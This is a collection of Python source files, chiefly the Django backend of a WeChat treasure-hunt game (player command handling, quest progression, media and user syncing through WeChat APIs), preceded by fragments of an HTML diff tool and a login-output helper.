outFile.write( "<meta charset='utf-8'>\n" )
outFile.write( "<title>diff of " + cgi_escape( filename1 ) + " and " + cgi_escape( filename2 ) + "</title>\n" )
outFile.write( "<style>\n" )
if same_size:
outFile.write( ".new{color:darkgreen}\n" )
outFile.write( ".old{color:red}\n" )
else:
outFile.write( ".new{color:darkgreen;font-size: 25px;}\n" )
outFile.write( ".old{color:red;font-size: 25px;}\n" )
outFile.write( "</style>\n" )
outFile.write( "</head>\n" )
outFile.write( "<body>\n" )
backwardsList.reverse()
printDiffs( backwardsList, outFile )
outFile.write( "</body>\n" )
outFile.write( "</html>\n" )
if __name__ == "__main__":
main(sys.argv[1:])
```
|
{
"source": "JEdwards27/Dist_Login",
"score": 2
}
|
#### File: Dist_Login/Libraries/output.py
```python
import data_handler
import crypto_handler
def output_results(username, password, group):
print("Username", username)
print("Password", password)
print(" Group", group)
compiled_key = data_handler.read_stored_key(username, group)
print(" CompKey", compiled_key)
compiled_key_fingerprint = crypto_handler.fingerprint_data(compiled_key)
print("KeyPrint", compiled_key_fingerprint)
```
|
{
"source": "jedwin/wechat",
"score": 2
}
|
#### File: wechat/wxcloudrun/ExploerGameHandler.py
```python
from django.core.exceptions import *
from wxcloudrun.common_functions import *
import datetime
from wxcloudrun.models import *
from wxcloudrun.location_game import *
def handle_player_command(app_en_name='', open_id='', game_name='', cmd='', for_text=True):
"""
用于处理某个玩家对某个游戏发出了某个指令
所有参数都是字符串
返回字典对象
{'game_is_valid': true/false,
'game_is_active': true/false,
'player_is_audit': true/false,
'player_info': player_info_dict, 该玩家的基本信息,昵称、头像等
'player_game_info': player_game_info_dict, 该玩家在处理完这个指令后的存档
'reply_obj': object, 用于回复的主要内容, 如果for_text==True,就以旧版格式返回replyMsg,否则返回字符串
'reply_options': [reply_opt_dict1, reply_opt_dict2], 用于显示下一步的选项及额外内容
'hint_string': string, 当前任务的提示信息,放在前端随时显示
'clear_code': string, 通关密码,放在前端显示,未通关时为空
'progress': string, 当前进度,放在前端随时显示
'notify_msg': string, 绿色的提醒
'error_msg': string, 红色的提醒
'app_en_name': string,
'open_id': string,
'quest_trigger': string, 用来做页面的title
'page_type': string, 目前分为reward和quest两种,分别对应问题页面和成就页面
'answer_is_correct': bool 如果用户提交的是答案,而且答对了,就返回True,否则一律返回False
}
"""
# 初始化返回对象
ret_dict = dict()
ret_dict['game_is_valid'] = False
ret_dict['game_is_active'] = False
ret_dict['player_is_audit'] = False
ret_dict['player_info'] = dict()
ret_dict['player_game_info'] = dict()
ret_dict['reply_obj'] = ''
ret_dict['reply_options'] = list()
ret_dict['hint_string'] = ''
ret_dict['clear_code'] = ''
ret_dict['progress'] = ''
ret_dict['notify_msg'] = ''
ret_dict['error_msg'] = ''
ret_dict['cur_game_name'] = ''
ret_dict['app_en_name'] = ''
ret_dict['open_id'] = ''
ret_dict['quest_trigger'] = ''
ret_dict['page_type'] = ''
ret_dict['answer_is_correct'] = False
# 为了和文字版统一处理,增加fromUser空变量
fromUser = ''
# 首先获取app信息,my_app
if len(app_en_name) > 0:
try:
my_app = WechatApp.objects.get(en_name=app_en_name)
app_keyword_list = [x.keyword for x in AppKeyword.objects.filter(app=my_app)]
ret_dict['app_en_name'] = app_en_name
except ObjectDoesNotExist:
# en_name not valid
ret_dict['error_msg'] = f'app_en_name:{app_en_name} 不存在'
return ret_dict
else:
# app_en_name not valid
ret_dict['error_msg'] = f'app_en_name is blank'
return ret_dict
# 检查这个openid对应的用户对象,cur_player
if len(open_id) > 0:
try:
cur_player = WechatPlayer.objects.get(app=my_app, open_id=open_id)
except ObjectDoesNotExist:
# 如果这个openid没有在数据库中,则表明不是从微信进入,需要返回错误信息
ret_dict['error_msg'] = '用户id异常,请从公众号进入游戏'
return ret_dict
ret_dict['open_id'] = open_id
else:
# open_id not valid
ret_dict['error_msg'] = f'open_id is blank'
return ret_dict
# 如果参数中带了game_name内容,就用game_name获取游戏
# 如果game_name为空,就以用户的cur_game_name属性获取游戏
# 如果cur_player.cur_game_name也为空,就返回失败信息
if len(game_name) > 0:
cur_game_name = game_name
elif len(cur_player.cur_game_name) > 0:
cur_game_name = cur_player.cur_game_name
else:
# game_name not valid
ret_dict['error_msg'] = f'game_name is blank'
return ret_dict
# 获取游戏对象,cur_game
try:
cur_game = ExploreGame.objects.get(app=my_app, name=cur_game_name)
ret_dict['game_is_valid'] = True
ret_dict['cur_game_name'] = cur_game_name
except ObjectDoesNotExist:
# 如果配置的游戏名称已经不存在,就清空已配置的名称
# 触发词列表置空
cur_player.cur_game_name = ''
cur_player.save()
cur_game = None
ret_dict['error_msg'] = f'游戏{cur_game_name}不存在'
return ret_dict
# 检查游戏激活状态
# 如果当前游戏处于激活状态,初始化游戏对应的对象
# 触发词列表、当前玩家游戏存档、已获成就、历史命令列表、通关码、鉴权信息
if cur_game.is_active:
ret_dict['game_is_active'] = True
cur_player_game_dict = get_cur_player_game_dict(player=cur_player, game_name=cur_game_name)
reward_list = cur_player_game_dict.get(FIELD_REWARD_LIST, list())
cmd_dict = cur_player_game_dict.get(FIELD_COMMAND_DICT, dict())
clear_code = cur_player_game_dict.get(FIELD_CLEAR_CODE, '')
player_is_audit = cur_player_game_dict.get(FIELD_IS_AUDIT, False)
wait_status = cur_player_game_dict.get(FIELD_WAIT_STATUS, '')
if len(wait_status) > 0:
try:
cur_quest = ExploreGameQuest.objects.get(game=cur_game, quest_trigger=wait_status)
next_list = cur_quest.get_content_list(type='next')
if len(next_list) > 0:
trigger_list = next_list
trigger_list.append(wait_status)
if len(cur_quest.back_quest) > 0:
trigger_list.append(cur_quest.back_quest)
except ObjectDoesNotExist:
next_list = list()
else:
next_list = list()
if len(next_list) == 0:
trigger_list = [x.quest_trigger for x in ExploreGameQuest.objects.filter(game=cur_game)]
ret_dict['player_is_audit'] = player_is_audit
ret_dict['player_game_info'] = cur_player_game_dict
ret_dict['player_info'] = cur_player.user_info
ret_dict['clear_code'] = clear_code
ret_dict['progress'] = cur_game.check_progress(reward_list=reward_list)
else:
# 如果游戏不是激活状态
ret_dict['error_msg'] = f'游戏{cur_game_name}未启动或已过活动时间'
return ret_dict
# 但需要检查用户是否鉴权
if player_is_audit:
# 开始检查cmd指令
if len(cmd) > 0:
content = cmd
if content in trigger_list:
# 如果用户尝试触发新任务
ret_dict['answer_is_correct'] = True
cur_quest = ExploreGameQuest.objects.get(game=cur_game, quest_trigger=content)
prequire_list = cur_quest.get_content_list(type='prequire')
if set(prequire_list).issubset(set(reward_list)) or len(prequire_list) == 0:
# 如果这个Quest没有前置要求,或前置要求都达到了
if cur_quest.reward_id in reward_list:
# 如果玩家已经通关这个任务,就显示对应的成就页面
ret_dict = set_reward(quest=cur_quest, ret_dict=ret_dict)
else:
# 如果玩家还没通过这个任务,就显示问题页面
wait_status = content
cur_player_game_dict[FIELD_WAIT_STATUS] = wait_status
cur_player.game_hist[cur_game_name] = cur_player_game_dict
cur_player.save()
ret_dict = set_quest(cur_game=cur_game, trigger=content, open_id=open_id,
ret_dict=ret_dict, reward_list=reward_list)
else:
# 前置要求还没做全
done_id_list = set(reward_list).intersection(set(prequire_list))
all_quest = ExploreGameQuest.objects.filter(game=cur_game)
done_q_name_list = list()
for q in all_quest:
if q.reward_id in done_id_list:
done_q_name_list.append(q.quest_trigger)
text_content = f'要回答这个问题,需要先完成{len(prequire_list)}个任务,'
text_content += f'而{ret_dict["progress"]}。'
ret_dict['error_msg'] = text_content
elif len(wait_status) > 0: # 如果用户已经处于等待输入状态
# 用户已处于某个Quest中,等待输入答案
if wait_status in trigger_list:
# 如果用户已经处于某个quest的任务中
try:
cur_quest = ExploreGameQuest.objects.get(game=cur_game, quest_trigger=wait_status)
answer_list = cur_quest.get_content_list(type='answer')
next_list = cur_quest.get_content_list(type='next')
cmd_list = cmd_dict.get(wait_status, list())
except ObjectDoesNotExist:
# 玩家等待状态设置错误,可能是游戏配置已更改
# 清空等待状态,将answer_list置为空列表
wait_status = ''
cur_player_game_dict[FIELD_WAIT_STATUS] = wait_status
cur_player.game_hist[cur_game_name] = cur_player_game_dict
cur_player.save()
answer_list = list()
cur_quest = None
ret_dict = new_game(cur_game=cur_game, reward_list=reward_list, ret_dict=ret_dict)
text_content = f'任务已取消,请重新开始另一个任务'
ret_dict['error_msg'] = text_content
return ret_dict
if content in answer_list:
# 答对了当前问题
reward_id = cur_quest.reward_id
ret_dict['answer_is_correct'] = True
# 如果玩家是新获得的奖励,就增加1个步数,保存奖励记录
# 如果玩家之前已经获得过奖励,就忽略
if reward_id > 0 and reward_id not in reward_list:
cmd_list.append(content)
cmd_dict[wait_status] = cmd_list
reward_list.append(reward_id)
cur_player_game_dict[FIELD_REWARD_LIST] = reward_list
cur_player_game_dict[FIELD_COMMAND_DICT] = cmd_dict
cur_player.game_hist[cur_game_name] = cur_player_game_dict
# ret_dict['notify_msg'] = cur_quest.reward
if len(next_list) == 0: # 没有下一步,即简单的游戏模式
# 重置玩家当前等待状态,并保存
wait_status = ''
cur_player_game_dict[FIELD_WAIT_STATUS] = wait_status
cur_player.game_hist[cur_game_name] = cur_player_game_dict
cur_player.save()
# 确认玩家是否已通关
clear_requirement_list = cur_game.get_content_list()
if set(clear_requirement_list).issubset(set(reward_list)):
# 玩家已达到通关要求
clear_code = cur_player.hash_with_game(cur_game_name)
cur_player_game_dict[FIELD_CLEAR_CODE] = clear_code
cur_player.game_hist[cur_game_name] = cur_player_game_dict
cur_player.save()
text_content = f'{cur_game.clear_notice}'
text_content += '\n'
text_content += f'您的通关密码是:{clear_code}'
ret_dict['notify_msg'] = text_content
ret_dict['clear_code'] = clear_code
else:
# 玩家还没通关
replyMsg = cur_quest.reply_msg(type='reward', toUser=open_id, fromUser=fromUser,
for_text=for_text)
ret_dict['reply_obj'] = replyMsg
# 重置游戏界面
# ret_dict = new_game(cur_game=cur_game, reward_list=reward_list, ret_dict=ret_dict)
# 进入显示成就页面
ret_dict = set_reward(quest=cur_quest, ret_dict=ret_dict)
else: # 有next_list,就生成下一步的页面
ret_dict['answer_is_correct'] = True
wait_status = next_list[0]
cur_player_game_dict[FIELD_WAIT_STATUS] = wait_status
cur_player.game_hist[cur_game_name] = cur_player_game_dict
cur_player.save()
ret_dict = set_quest(cur_game=cur_game, open_id=open_id, ret_dict=ret_dict,
reward_list=reward_list)
else:
# 输入了不相关的内容
cmd_list.append(content)
cmd_dict[wait_status] = cmd_list
cur_player_game_dict[FIELD_COMMAND_DICT] = cmd_dict
cur_player.game_hist[cur_game_name] = cur_player_game_dict
cur_player.save()
my_error_auto_replys = list(ErrorAutoReply.objects.filter(is_active=True))
ret_dict = set_quest(cur_game=cur_game, trigger=wait_status,
ret_dict=ret_dict, open_id=open_id, reward_list=reward_list)
if len(my_error_auto_replys) > 0:
choose_reply = sample(my_error_auto_replys, 1)[0]
ret_dict['error_msg'] = choose_reply.reply_msg(toUser=open_id, fromUser=fromUser,
for_text=for_text)
else:
ret_dict['error_msg'] = f'{error_reply_default}'
elif wait_status == WAITING_FOR_PASSWORD:
# 如果用户已经完成鉴权,但状态是等待输入密码,就可能人为修改了鉴权状态,先清空等待状态
wait_status = ''
cur_player_game_dict[FIELD_WAIT_STATUS] = wait_status
cur_player.game_hist[cur_game_name] = cur_player_game_dict
cur_player.save()
ret_dict = new_game(cur_game=cur_game, reward_list=reward_list, ret_dict=ret_dict)
else: # 如果cmd为空,就显示游戏的初始化内容
wait_status = ''
cur_player_game_dict[FIELD_WAIT_STATUS] = wait_status
cur_player.game_hist[cur_game_name] = cur_player_game_dict
cur_player.save()
ret_dict = new_game(cur_game=cur_game, reward_list=reward_list, ret_dict=ret_dict)
else:
# user is not audit
# 等待用户输入密码
content = cmd
if wait_status == WAITING_FOR_PASSWORD:
# 玩家正在输入密码
if len(content) > 0:
result = auth_user(game=cur_game, password=content, user_id=open_id)
if result:
player_is_audit = True
wait_status = ''
cur_player_game_dict[FIELD_WAIT_STATUS] = wait_status
cur_player_game_dict[FIELD_IS_AUDIT] = player_is_audit
cur_player.game_hist[cur_game_name] = cur_player_game_dict
cur_player.save()
ret_dict = new_game(cur_game=cur_game, reward_list=reward_list, ret_dict=ret_dict)
ret_dict['player_is_audit'] = True
ret_dict['answer_is_correct'] = True
ret_dict['cmd'] = ''
else:
# 没有输对密码
ret_dict['error_msg'] = AUDIT_FAILED
ret_dict['page_type'] = 'password' # 因为需要输入密码
else: # cmd为空,再次显示请输入密码
ret_dict['error_msg'] = ASK_FOR_PASSWORD
ret_dict['page_type'] = 'password' # 因为需要输入密码
else:
wait_status = WAITING_FOR_PASSWORD
cur_player_game_dict[FIELD_WAIT_STATUS] = wait_status
cur_player.game_hist[cur_game_name] = cur_player_game_dict
cur_player.save()
ret_dict['error_msg'] = ASK_FOR_PASSWORD
ret_dict['page_type'] = 'password' # 因为需要输入密码
return ret_dict
def get_cur_player_game_dict(player, game_name):
"""
返回玩家游戏存档字典
"""
player_game_dict = player.game_hist # json object
# player_game_dict should be like this
# {'cur_game_name': {setting1: xxx, setting2: xxx}}
if len(game_name) > 0:
# 如果游戏名不为空
if not player_game_dict:
# 如果这个玩家还没有游戏存档,就用输入的游戏名初始化一个
cur_player_game_dict = {FIELD_IS_AUDIT: False,
FIELD_COMMAND_DICT: dict(),
FIELD_CLEAR_CODE: '',
FIELD_REWARD_LIST: list()}
player_game_dict = {game_name: cur_player_game_dict}
player.game_hist = player_game_dict
player.save()
else:
# 如果玩家已经有游戏存档
cur_player_game_dict = player_game_dict.get(game_name, dict())
else:
# 如果输入的游戏名为空,返回空字典
cur_player_game_dict = dict()
return cur_player_game_dict
def set_quest_option(my_quest, reward_list):
# 判断某个任务的状态(已完成、可挑战或不能挑战),返回显示选项
# 如果判断为不显示,则返回None
prequire_list = my_quest.get_content_list(type='prequire')
if my_quest.reward_id in reward_list:
# 如果这个Quest已经通关
return {'trigger': my_quest.quest_trigger, 'comment': my_quest.comment_when_clear,
'enable': True, 'style': OPTION_ENABLE}
elif set(prequire_list).issubset(set(reward_list)) or len(prequire_list) == 0:
# 如果这个Quest没有前置要求,或前置要求都达到了
return {'trigger': my_quest.quest_trigger, 'comment': my_quest.comment_when_available,
'enable': True, 'style': OPTION_ENABLE}
else:
# 其他情况,还不能挑战这个任务,判断是否要显示
if my_quest.show_if_unavailable:
return {'trigger': my_quest.quest_trigger, 'comment': my_quest.comment_when_unavailable,
'enable': False, 'style': OPTION_DISABLE}
else:
return None
def new_game(cur_game, reward_list, ret_dict):
ret_dict['reply_obj'] = cur_game.show_opening()
ret_dict['reply_options'] = list()
entry_quest = None
if len(cur_game.entry) > 0:
try:
entry_quest = ExploreGameQuest.objects.get(game=cur_game, quest_trigger=cur_game.entry)
except ObjectDoesNotExist:
# 游戏入口任务不存在,回退到显示所有可选任务
pass
if entry_quest:
quest_option = set_quest_option(my_quest=entry_quest, reward_list=reward_list)
if quest_option:
ret_dict['reply_options'].append(quest_option)
else:
qeusts = ExploreGameQuest.objects.filter(game=cur_game).order_by('reward_id')
for cur_quest in qeusts:
# 将可以挑战的任务放在选项中
quest_option = set_quest_option(my_quest=cur_quest, reward_list=reward_list)
if quest_option:
ret_dict['reply_options'].append(quest_option)
ret_dict['progress'] = cur_game.check_progress(reward_list=reward_list)
ret_dict['quest_trigger'] = cur_game.name
ret_dict['page_type'] = 'main'
return ret_dict
def set_quest(cur_game, trigger, ret_dict, open_id, reward_list=list()):
cur_quest = ExploreGameQuest.objects.get(game=cur_game, quest_trigger=trigger)
fromUser = ''
for_text = False
ret_dict['reply_obj'] = cur_quest.reply_msg(type='question', toUser=open_id,
fromUser=fromUser, for_text=for_text)
option_list = cur_quest.get_content_list(type='option')
next_list = cur_quest.get_content_list(type='next')
if len(next_list) > 0 and cur_quest.show_next:
for next_trigger in next_list:
try:
next_quest = ExploreGameQuest.objects.get(game=cur_game, quest_trigger=next_trigger)
quest_option = set_quest_option(my_quest=next_quest, reward_list=reward_list)
if quest_option:
ret_dict['reply_options'].append(quest_option)
except ObjectDoesNotExist:
logger.error(f'{next_trigger} is not exists')
else:
for option in option_list:
ret_dict['reply_options'].append({'trigger': option,
'comment': '',
'enable': True,
'style': OPTION_ENABLE})
ret_dict['hint_string'] = cur_quest.reply_msg(type='hint', toUser=open_id,
fromUser=fromUser, for_text=for_text)
ret_dict['quest_trigger'] = trigger
ret_dict['page_type'] = 'quest'
ret_dict['audio_link'] = cur_quest.audio_link
return ret_dict
def set_reward(quest, ret_dict):
fromUser = ''
toUser = ''
for_text = False
ret_dict['reply_obj'] = quest.reply_msg(type='reward', toUser=toUser,
fromUser=fromUser, for_text=for_text)
ret_dict['quest_trigger'] = quest.quest_trigger
ret_dict['hint_string'] = ''
ret_dict['page_type'] = 'reward'
return ret_dict
```
#### File: wechat/wxcloudrun/models.py
```python
from django.db import models
from django.core.exceptions import *
from hashlib import sha1
from wxcloudrun.coordinate_converter import *
from django.db.models import F, Q, When, Count
import urllib3
import requests
import certifi
import json
import time
import os
import csv
import re
from wxcloudrun import reply
# from django.core.exceptions import ValidationError, ObjectDoesNotExist
from django.utils.translation import gettext_lazy as _
errcode_access_token_expired = 42001
errcode_access_token_missing = 41001
errstring_access_token_expired = 'acc token refreshed, please re-run'
errstring_access_token_refresh_failed = 'acc token refresh failed'
errcode_access_token_refresh_failed = -2
errcode_media_type_incorrect = -3
errcode_unkown_error = -9
SEP_SYM = '|' # 用于分隔多个内容的符号,后面会被用在split()函数中
keyword_hint = '提示'
keyword_card = '卡'
keyword_restart = '重新开始'
keyword_go_back = '返回'
keyword_start = '开始游戏'
keyword_control = '特殊指令'
keyword_invite = '邀请加入'
keyword_change_process = '改变进度'
error_reply_default = '你输入的答案不对,请再想想'
errcode_file = 'errcode.csv'
default_error_string = 'Unknow error'
def get_error_string(in_code, in_file=errcode_file, default_string=default_error_string):
"""
从腾讯的errcode文档中,找到对应的错误解释
:param in_code: 腾讯中为正数,为了区分admin.py里面的返回值count,特意将错误码同一换成相反数
:param in_file: 存储腾讯错误码的csv文件
:param default_string: 无法找到对应错误码时返回的默认字符串
:return: 如果能在in_file中找到解释就返回该解释,否则返回default_string
"""
if os.path.exists(in_file):
with open(in_file, 'r', encoding='utf-8') as f:
error_lines = [x.split(',') for x in f.readlines()]
for err_code, err_string in error_lines:
if str(in_code) == err_code:
return err_string
# 如果整个循环结束仍为找到对应的err_code,就返回默认字符串
return default_string
else:
# 如果没有找到错误码文件
return f'{in_file} is not exists'
# Create your models here.
class WechatApp(models.Model):
"""
WechatApp对象表示一个公众号
"""
appid = models.CharField(max_length=100)
secret = models.CharField(max_length=100)
token = models.CharField(max_length=200)
acc_token = models.CharField(max_length=500)
name = models.CharField(max_length=100)
en_name = models.CharField(max_length=100, default='')
cur_game_name = models.CharField(max_length=100, default='')
super_user = models.CharField(max_length=200, null=True)
def __str__(self):
return self.name
def super_user_list(self):
if self.super_user:
return self.super_user.split(SEP_SYM)
else:
return []
def refresh_access_token(self):
"""
从docker本地读取access_token
:return: access_token
"""
acc_token_file = '/.tencentcloudbase/wx/cloudbase_access_token'
with open(acc_token_file, 'r') as f:
self.acc_token = f.readline()
self.save()
return True
def get_subscr_players(self, next_openid=None):
"""
从微信服务器拉取已关注的用户清单,并与已有player清单对比,如果未在数据库的则补齐
反过来,数据库中有,但拉取中没有,可能是未关注的用户,不需要删除,但要打上标识
:param next_openid: 从这个id开始拉取,为None时从头开始拉取
:return: True/False
"""
# http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
total_count = 1 # 所有关注用户数量,预设为1,为了发起第一次拉取
got_count = 0 # 已获取的用户数量
succ_count = 0 # 更新用户信息成功个数
fail_count = 0 # 更新用户信息失败个数
while got_count < total_count:
# request_url = f'https://api.weixin.qq.com/cgi-bin/user/get?access_token={self.acc_token}'
request_url = f'http://api.weixin.qq.com/cgi-bin/user/get'
if next_openid:
# request_url += f'&next_openid={next_openid}'
request_url += f'?next_openid={next_openid}'
# a = http.request('GET', request_url).data.decode('utf-8')
# b = json.loads(a)
a = requests.get(request_url)
a.encoding = 'utf-8'
b = a.json()
errcode = b.get('errcode', 0)
if errcode == 0:
total_count = int(b['total'])
got_count += int(b['count'])
next_openid = b['next_openid']
# data should be like
# "data":{
# "openid":["OPENID1","OPENID2"]},
openid_list = b['data']['openid']
for openid in openid_list:
try:
my_player = WechatPlayer.objects.get(app=self, open_id=openid) # 应该最多只有1个
except ObjectDoesNotExist:
my_player = WechatPlayer(app=self, open_id=openid)
result, errcode = my_player.get_user_info()
if result:
succ_count += 1
else:
fail_count += 1
elif errcode == errcode_access_token_expired:
if self.refresh_access_token():
return False, errstring_access_token_expired
else:
return False, errstring_access_token_refresh_failed
else:
errcode = 0 - int(b['errcode'])
error_string = get_error_string(errcode)
return False, error_string
# 如果成功,返回获取到的关注用户数量
return True, f'共有{got_count}个关注用户,成功更新{succ_count}个,失败{fail_count}个'
def get_media_from_tencent(self, media_type):
"""
从微信公众号服务器上更新图片、视频或语音素材
同时会删除不在服务器上的条目
:media_type:
:return: resource_dict
"""
# http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
resource_dict = dict()
offset = 0
if self.refresh_access_token():
# request_url = f'https://api.weixin.qq.com/cgi-bin/material/batchget_material?access_token={self.acc_token}'
request_url = f'http://api.weixin.qq.com/cgi-bin/material/batchget_material'
try:
total_count = self.get_resource_count(media_type=f'{media_type}_count')
if total_count > 0:
# 从数据库中取出现有素材
images_in_db = WechatMedia.objects.filter(app=self, media_type=media_type)
media_id_in_db_list = [x.media_id for x in images_in_db]
print(f'media_id_in_db_list: {media_id_in_db_list}')
# 获得图片总数后,进行全量抓取
media_id_in_server_list = list()
while offset <= total_count:
# form_data = f'''{{
# "type":"{media_type}",
# "offset":{offset},
# "count":20
# }}'''
# a = http.request('POST', request_url, body=form_data, encode_multipart=False).data.decode(
# 'utf-8')
# b = json.loads(a)
form_data = {'type': media_type, 'offset': offset, 'count': 20}
a = requests.post(request_url, data=json.dumps(form_data, ensure_ascii=False).encode('utf-8'))
# print(f'a.encoding={a.encoding}')
a.encoding = 'utf-8'
b = a.json()
# print(f'a.encoding={a.encoding}')
errcode = b.get('errcode', 0)
if errcode == 0:
items = b['item']
item_count = b['item_count']
if item_count == 0:
break
offset += item_count
for item_dict in items:
# print(item_dict)
media_id = item_dict['media_id']
media_name = item_dict['name']
media_id_in_server_list.append(media_id)
# item_url = item_dict['url']
if media_id in media_id_in_db_list:
# 如果数据库已有media_id相同的对象,就先删除
old_medias = WechatMedia.objects.filter(app=self, media_id=media_id,
media_type=media_type)
old_medias.delete()
my_media = WechatMedia(app=self, media_id=media_id, media_type=media_type,
name=media_name, info=item_dict)
my_media.save()
else:
errcode = 0 - errcode
error_string = get_error_string(errcode)
return False
time.sleep(0.1)
# 清理数据库中冗余的条目
for media_id in media_id_in_db_list:
if media_id not in media_id_in_server_list:
try:
my_image = WechatMedia.objects.get(app=self, media_id=media_id)
my_image.delete()
except ObjectDoesNotExist:
pass
return total_count
else:
# if total_count==0 means no resources in wechat server yet
# else some other error occured, return total_count directly
return total_count
except:
return errcode_unkown_error
else:
# failed to refresh access_token
return errcode_access_token_refresh_failed
def get_resource_count(self, media_type="image_count"):
"""
:param media_type: "voice_count", "video_count","image_count", "news_count"
:return:
"""
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
# request_count_url = f'https://api.weixin.qq.com/cgi-bin/material/get_materialcount?access_token={self.acc_token}'
request_count_url = f'http://api.weixin.qq.com/cgi-bin/material/get_materialcount'
# 获取图片总数
# a = http.request('GET', request_count_url).data.decode('utf-8')
# b = json.loads(a)
a = requests.get(request_count_url)
a.encoding = 'utf-8'
b = a.json()
print(f'b={b}')
errcode = b.get('errcode', 0)
if errcode > 0:
# print(b)
# returning the negative value for error indicator
return 0 - errcode
else:
if media_type in b.keys():
total_count = b[media_type]
print(f'return count: {total_count}')
return total_count
else:
print(f'media_type incorrect: {media_type}')
return errcode_media_type_incorrect
def image_count(self):
return WechatMedia.objects.filter(app=self, media_type='image').count()
def video_count(self):
return WechatMedia.objects.filter(app=self, media_type='video').count()
def subscriber_count(self):
return WechatPlayer.objects.filter(app=self, subscribe=1).count()
def add_menu(self, remark='', menu_string=None):
my_menu = WechatMenu(app=self, remark=remark, menu_string=menu_string)
my_menu.save()
class WechatMedia(models.Model):
"""
微信公众号的图片、视频、语音资源
这种资源的info字段一样
额外添加media_type来区分
"""
app = models.ForeignKey(WechatApp, on_delete=models.CASCADE)
media_id = models.CharField(max_length=100, null=True)
name = models.CharField(max_length=200, null=True, blank=True)
info = models.JSONField()
media_type = models.CharField(max_length=20, null=True)
def __str__(self):
my_info = self.info
return self.name
def url(self):
my_info = self.info
return my_info.get('url', '')
def update_time(self):
my_info = self.info
time_str = time.localtime(my_info['update_time'])
return time.strftime("%Y-%m-%d %H:%M:%S", time_str)
def tags(self):
my_info = self.info
return my_info.get('tags', '')
def delete_from_wechat(self):
"""
根据media id list删除图片素材
:return: images_dict
"""
media_count = self.app.get_resource_count() # 用于确保刷新access_token
if media_count >= 0:
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
request_url = f'https://api.weixin.qq.com/cgi-bin/material/del_material?access_token={self.app.acc_token}'
my_info = json.loads(self.info)
media_id = my_info['media_id']
name = my_info['name']
print(f'deleting {media_id}')
form_data = f'''{{
"media_id":"{media_id}"
}}'''
a = http.request('POST', request_url, body=form_data, encode_multipart=False).data.decode('utf-8')
b = json.loads(a)
errcode = b.get('errcode', 0)
if errcode > 0:
errcode = 0 - int(b['errcode'])
error_string = get_error_string(errcode)
return False
else:
self.delete()
# print(f'已成功删除{name}')
return True
else:
print(f'Can not get media_count')
return False
def replace_content_with_hyperlink(my_content):
"""
通过正则表达式查找文本中带【xx】的关键词,并替换成如下微信回复超链接
【<a href="weixin://bizmsgmenu?msgmenuid=1&msgmenucontent=xx">xx</a>】
如果超过1过选项,就在最后列出每个选项的超链接,样式如下:
你的选择是?
xxxx
yyyy
:param my_content:
:return:
"""
def insert_hyperlink(matched):
link_before = '【<a href="weixin://bizmsgmenu?msgmenuid=1&msgmenucontent='
link_mid = '">'
link_after = '</a>】'
keyword = matched.group('keyword')
return f'{link_before}{keyword}{link_mid}{keyword}{link_after}'
# 根据Python文档,使用(?P<name>...)语法时,那这个name,可以直接在re.sub()中repl参数指定的函数里引用
# 例如insert_hyperlink函数中只会带1个参数--matched对象,它的group函数就可以直接调用以name命名的匹配字符串
re_pattern = '【(?P<keyword>[^】]+)】'
matches = re.findall(pattern=re_pattern, string=my_content)
# link_before = '<a href="weixin://bizmsgmenu?msgmenuid=1&msgmenucontent='
# link_mid = '">'
# link_after = '</a>'
if len(matches) > 0:
# # 如果超过1过选项,就在最后列出每个选项的超链接
# attached_string = f'\n你的选择是?\n\n'
# for keyword in matches:
# attached_string += f'''{link_before}{keyword}{link_mid}{keyword}{link_after}\n\n'''
# return f'{my_content}\n{attached_string}'
# elif len(matches) == 1:
# # 如果只有1个关键词,就直接将关键词替换成超链接
my_result = re.sub(pattern=re_pattern, repl=insert_hyperlink, string=my_content)
return my_result
else:
# 如果文本中没有关键词,就按原样返回
return my_content
class WechatPlayer(models.Model):
app = models.ForeignKey(WechatApp, on_delete=models.CASCADE, null=True)
name = models.CharField(max_length=100, default='-', blank=True)
open_id = models.CharField(max_length=100, default='', primary_key=True)
cur_game_name = models.CharField(max_length=100, default='', blank=True)
is_audit = models.BooleanField(default=False)
game_hist = models.JSONField(null=True, blank=True)
nickname = models.CharField(max_length=100, default='', blank=True)
remark = models.CharField(max_length=100, default='', blank=True)
subscribe_scene = models.CharField(max_length=100, default='', blank=True)
sex = models.IntegerField(null=True, blank=True)
tagid_list = models.CharField(max_length=200, default='', blank=True)
user_info = models.JSONField(null=True, blank=True)
subscribe = models.IntegerField(default=0, blank=True)
head_image = models.URLField(max_length=500, default='', blank=True)
cur_location = models.CharField(max_length=200, default='', blank=True)
cur_longitude = models.FloatField(null=True, blank=True)
cur_latitude = models.FloatField(null=True, blank=True)
cur_Precision = models.FloatField(null=True, blank=True)
poi_keyword = models.CharField('搜索兴趣点的关键词', max_length=50, default='', blank=True)
poi_dist = models.IntegerField('搜索兴趣点的距离范围', default=100, blank=True)
waiting_status_choice = [('', 'not in waiting status'), ('w_keyword', 'waiting for keyword'),
('w_dist', 'waiting for distance'), ('w_password', 'waiting for password')]
waiting_status = models.CharField(max_length=50, default='', blank=True)
# tag_id = models.IntegerField(default=0, blank=True)
# {'game_list': [WechatGameData]}
def __str__(self):
return self.nickname
def game_data_count(self):
return len(WechatGameData.objects.filter(player=self))
def save(self, *args, **kwargs):
self.poi_dist = max(self.poi_dist, 10)
super().save(*args, **kwargs)
def set_remark(self, remark):
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
request_url = f'https://api.weixin.qq.com/cgi-bin/user/info/updateremark?access_token={self.app.acc_token}'
form_data = f'''{{
"openid":"{self.open_id}",
"remark":"{self.remark}"
}}'''
a = http.request('POST', request_url, body=form_data.encode('utf-8'),
encode_multipart=False).data.decode('utf-8')
b = json.loads(a)
errcode = b.get('errcode', 0)
if errcode == errcode_access_token_expired:
if self.app.refresh_access_token():
return False, errstring_access_token_expired
else:
return False, errstring_access_token_refresh_failed
elif errcode > 0:
errcode = 0 - int(b['errcode'])
error_string = get_error_string(errcode)
return False, error_string
else:
# 如果成功获取信息,就直接返回json文件
return True, b
def get_user_info(self):
"""
从微信服务器获取某个用户的信息
:param openid: 用户的openid
:return: 返回用户信息
"""
request_url = f'http://api.weixin.qq.com/cgi-bin/user/info?openid={self.open_id}&lang=zh_CN'
